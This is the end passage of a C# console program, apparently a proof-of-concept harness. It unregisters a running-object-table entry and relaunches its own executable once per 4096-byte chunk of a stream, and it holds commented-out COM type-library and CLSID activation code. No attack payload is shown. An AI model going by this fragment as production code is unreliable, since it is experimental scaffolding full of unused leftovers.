                        //  Guid g = new Guid("{21D6D48E-A88B-11D0-83DD-00AA003CCABD}");
                        //from PoC
                        // `g` and `tpLib` are leftovers; neither is used by live code.
                        Guid g = new Guid("{9E175B68-F52A-11D8-B9A5-505054503030}");
                        object tpLib;
                        //    int b=  LoadRegTypeLib(ref tapi3guid, 1, 0, 0, out tpLib);
                        // One iteration per 4096-byte chunk of the file: relaunch this
                        // executable in child mode, wait for it, then wait for a key press.
                        while (stm.Read(bts, 0, 4096) > 0)
                        {
                            //Type t = Type.GetTypeFromCLSID(g);
                            //Activator.CreateInstance(t);
                            Process ps = Process.Start(Process.GetCurrentProcess().MainModule.FileName, "-x");
                            ps.WaitForExit();
                            Console.ReadKey();
                            Console.WriteLine("Exited");
                        }
                        Console.ReadKey();
                    }
                    rot.Revoke(cookie);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
            Console.ReadKey();
        }
    }
}
